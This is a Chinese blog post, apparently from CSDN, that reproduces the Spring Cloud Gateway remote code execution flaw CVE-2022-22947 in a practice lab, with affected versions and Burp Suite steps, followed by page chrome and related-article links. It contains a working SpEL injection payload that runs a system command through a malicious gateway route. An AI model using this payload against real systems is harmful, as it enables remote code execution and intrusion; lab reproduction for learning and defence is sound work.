靶场复现——Spring Cloud Gateway 远程代码执行漏洞

最新推荐文章于 2024-08-07 19:34:32 发布
最新推荐文章于 2024-08-07 19:34:32 发布
阅读量2.9k 收藏
点赞数
分类专栏: 笔记 安全 靶场 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46601374/article/details/123953929
版权
笔记 同时被 3 个专栏收录
44 篇文章 4 订阅
订阅专栏
安全
13 篇文章 2 订阅
订阅专栏
靶场
9 篇文章 3 订阅
订阅专栏

当启用和暴露 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而远程执行任意代码。

Spring Cloud Gateway 提供了一个库,用于在 Spring WebFlux 之上构建 API 网关。

在 3.1.0 和 3.0.6 之前的版本中使用 Spring Cloud Gateway 的应用程序在启用、暴露和不安全的 Gateway Actuator 端点时容易受到代码注入攻击。远程攻击者可以发出恶意制作的请求,允许在远程主机上进行任意远程执行。

影响版本:

Spring Cloud Gateway 3.1.x < 3.1.1

Spring Cloud Gateway < 3.0.7

编号:CVE-2022-22947 

进入靶场:

刷新,使用burp抓包,将内容发送到Repeater模块。 

添加包含恶意SpEL表达式的路由,将payload粘贴到burpsuite替换掉原数据。(GET方式改为POST,恶意路由为hacktest,Content-Type为application/json)

 { "id": "EchoSec", "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"cat\",\"/flag\"}).getInputStream()))}" } }], "uri": "http://example.com" }

如果不成功就多试几次,注意间距

 

刷新网关,执行SpEL表达式,将payload粘贴到burpsuite替换掉原数据。(注意Content-Type改为application/x-www-form-urlencoded)

发送以下内容,得到命令执行结果,将payload粘贴到burpsuite替换掉原数据。

 

 发送DELETE请求,删除恶意路由,将payload粘贴到burpsuite替换掉原数据。

再次发送同样的DELETE请求,发现为404,说明上一步已成功删除恶意路由。

 

 复现完成

正在过坎
关注
专栏目录
【项目实战】对Spring Cloud Gateway 的相关端点进行权限管理
本本本添哥
09-06 38
在使用 Spring Cloud Gateway 时,我们通常需要对其相关的管理端点(如 Actuator 端点)进行权限管理。这可以通过 Spring Security 来实现。以下是一些步骤和配置示例,帮助你对 Spring Cloud Gateway 的端点进行权限管理。通过下面的步骤,你可以有效地对 Spring Cloud Gateway 的相关端点进行权限管理。如果你不需要 Actuator 端点,可以通过配置将其禁用;
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805)
qq_51577576的博客
12-15 1538
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805) Apache Struts2的REST插件存在远程代码执行的高危漏洞,其编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。
SpringCloudGateway远程代码执行(CVE-2022-22947)
m0_57379855的博客
03-12 1533
@TOC 基本介绍 微服务架构与Spring Cloud 【1】微服务架构 是一项在云中部署应用和服务的新技术。大部分围绕微服务的争论都集中在容器或其他技术是否能很好的实施微服务,而红帽说API应该是重点。 微服务可以在“自己的程序”中运行,并通过“轻量级设备与HTTP型API进行沟通”。 关键在于该服务可以在自己的程序中运行。 通过这一点我们就可以将服务公开与微服务架构(在现有系统中分布一个API)区分开来。 在服务公开中,许多服务都可以被内部独立进程所限制。 如果其中任何一个服务需要增加某种功能,那么就
SpringCloud Gateway 远程代码执行漏洞
qq_33240556的博客
06-18 632
Spring Cloud Gateway(SCG)本身并没有远程代码执行漏洞,但是,如果你在配置过程中使用了不安全代码或者依赖,可能会引入安全风险。:类似地,如果过滤器配置中的某些参数来自用户输入,且没有进行充分验证和过滤,也可能会被利用来执行远程代码。在使用自定义过滤器时,要确保传入过滤器的参数是安全的。:SCG依赖的其他库或组件可能存在安全漏洞,攻击者可以利用这些漏洞执行远程代码。字段来自用户输入,且没有进行严格的验证和过滤,可能会被攻击者利用来执行远程代码。,就需要格外注意输入的合法性。
Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947)
Fiverya的博客
01-10 1247
CVE-2022-22947
Spring Cloud Gateway远程代码执行漏洞复现(CVE-2022-22947)
m0_63299551的博客
06-24 517
这里在burp抓包时要将burp代理地址改为本机地址要不然会抓不到 127.0.0.1的数据包。接着创建application.yml文件 具体步骤和代码如下。将pom.xml文件替换成下面所写的。接着配置maven 这里参考了一篇文章。可以看到环境搭建成功 接着进行漏洞复现
Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947)修复建议
lujiawei00的专栏
03-04 1176
Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947)修复建议
Spring Cloud Gateway Actuator API SpEL 代码注入漏洞复现 (CVE-2022-22947)
yang1234567898的博客
04-25 3369
概念: 什么是spring cloudSpring Cloud是一系列框架的有序集合。它利用Spring Boot的开发便利性巧妙地简化了分布式系统基础设施的开发,如服务发现注册、配置中心、消息总线、负载均衡、断路器、数据监控等,都可以用Spring Boot的开发风格做到一键启动和部署。Spring Cloud并没有重复制造轮子,它只是将各家公司开发的比较成熟、经得起实际考验的服务框架组合起来,通过Spring Boot风格进行再封装屏蔽掉了复杂的配置和实现原理,最终给开发者留出了一套简单易懂、易
[ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)
qq_51577576的博客
03-12 1795
[ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839) WebLogic是美商Oracle的主要产品之一,系购并得来。是商业市场上主要的Java应用服务器软件之一,是世界上第一个成功商业化的J2EE应用服务器,目前已推出到14c版。而此产品也延伸出WebLogic Portal, WebLogic Integration等企业用的中间件,以及OEPE开发工具。
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-045(CVE-2017-5638)
qq_51577576的博客
10-17 632
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-045(CVE-2017-5638) 在使用基于Jakarta插件的文件上传功能时,可导致远程代码执行。例如在系统中获得管理员权限,执行添加用户。可任意查看、修改或删除文件。造成机密数据泄露,重要信息遭到篡改等重大危害。恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令。
CVE-2022-22965:Spring远程代码执行漏洞
m0_67392273的博客
07-31 395
先自我介绍一下,小编13年上师交大毕业,曾经在小公司待过,去过华为OPPO等大厂,18年进入阿里,直到现在。Springframework是Spring里面的一个基础开源框架,其目的是用于简化Java企业级应用的开发难度和开发周期,2022年3月31日,VMwareTanzu发布漏洞报告,SpringFramework存在远程代码执行漏洞,在JDK9+上运行的SpringMVC或SpringWebFlux应用程序可能容易受到通过数据绑定的远程代码执行(RCE)的攻击。...
SpringCloudGateway漏洞,快看看你的服务中招没?
Java笔记虾
03-13 1494
点击关注公众号,利用碎片时间学习同学们,最近相信大家都看到了SpringCloudGateway爆出相关漏洞的信息了,既然如此,你们还不抓紧修改自己的程序吗?即使你没涉及到此次的漏洞,我也...
Spring Cloud Gateway远程代码执行漏洞(CVE-2022-22947)
初岄的博客
07-09 922
Spring Cloud Gateway远程代码执行漏洞(CVE-2022-22947)
【vulhub靶场spring】——
最新发布
weixin_57240513的博客
08-07 438
Spring是Java EE编程领域的一个轻量级开源框架,该框架由一个叫Rod Johnson的程序员在2002年最早提出并随后创建,是为了解决企业级编程开发中的复杂性,业务逻辑层和其他各层的松耦合问题,因此它将面向接口的编程思想贯穿整个系统应用,实现敏捷开发的应用型框架。框架的主要优势之一就是其分层架构,分层架构允许使用者选择使用哪一个组件,同时为J2EE应用程序开发提供集成的框架。
Spring-Cloud-Function SpEL RCE(VULFOCUS靶场)
qq_44122254的博客
03-29 1419
漏洞描述:Spring Cloud Function 是基于Spring Boot 的函数计算框架,它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。 由于Spring Cloud Function中RoutingFunction类的apply方法将请求头中的“spring.cloud.function.routing-expression”参数作为Spel表达式进行处理,造成了Spel表达式注入漏洞,未经授权的远程攻击者可利用该漏洞执行任意代码漏洞影响: 3.0.
山东大学软件学院项目实训-创新实训-山大软院网络攻防靶场实验平台(三)-springboot学习
m0_47470899的博客
03-08 797
目录前言:一、Springboot 简介二、hello world1、项目创建方式一:使用Spring Initialize 的 Web页面创建项目2、项目创建方式二:使用 IDEA 直接创建项目3、测试 hello world参考资料 前言: 项目实训立项通过后的几天内,我的主要工作是完成了学习 docker 的相关知识,并在腾讯云服务器上安装 docker ,然后通过命令行对 docker 的基本使用进行基础操作实验。已经掌握了 docker 的基本使用,接下来我的任务便是学习如何使用 java 程
Spring Cloud Gateway关闭admin监控
绅士jiejie的博客
05-09 1284
Spring Cloud Gateway关闭admin监控
Gateway
IT_bird_flay的博客
02-26 365
1.概念 Gateway是在spring生态系统之上构建的API网关服务,基于Spring5,SpringBoot2和Project Reactor等技术。 Gateway旨在提供一种简单而有效的方式来对API进行路由,以及提供一些强大的过滤器功能,例如:熔断、限流、重试等. SpringCloud GatewaySpringCloud的一个全新项目,基于Spring5.0+SpringBoot2.0和Project Reactor等技术开发的网关,它...
Spring Cloud Gateway使用说明(7)-- actuator
xgw的专栏
08-16 9126
15. Actuator API /gatewayactuator端点允许监视Spring Cloud Gateway应用程序并与之交互。要进行远程访问,必须在应用程序属性中暴露HTTP或JMX 端口。 Example 72. application.properties management.endpoint.gateway.enabled=true # default value management.endpoints.web.exposure.include=gateway 15.1. 获取详细
网络安全靶场实战演练与漏洞攻防训练
从给出的文件名称列表“AJT-code”可以推测,该文件可能包含与漏洞利用相关的代码示例、靶场搭建的脚本代码漏洞测试脚本或其他与网络攻防相关的编程资源。这些资源对于学习和实践网络安全技术有着极为重要的作用。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值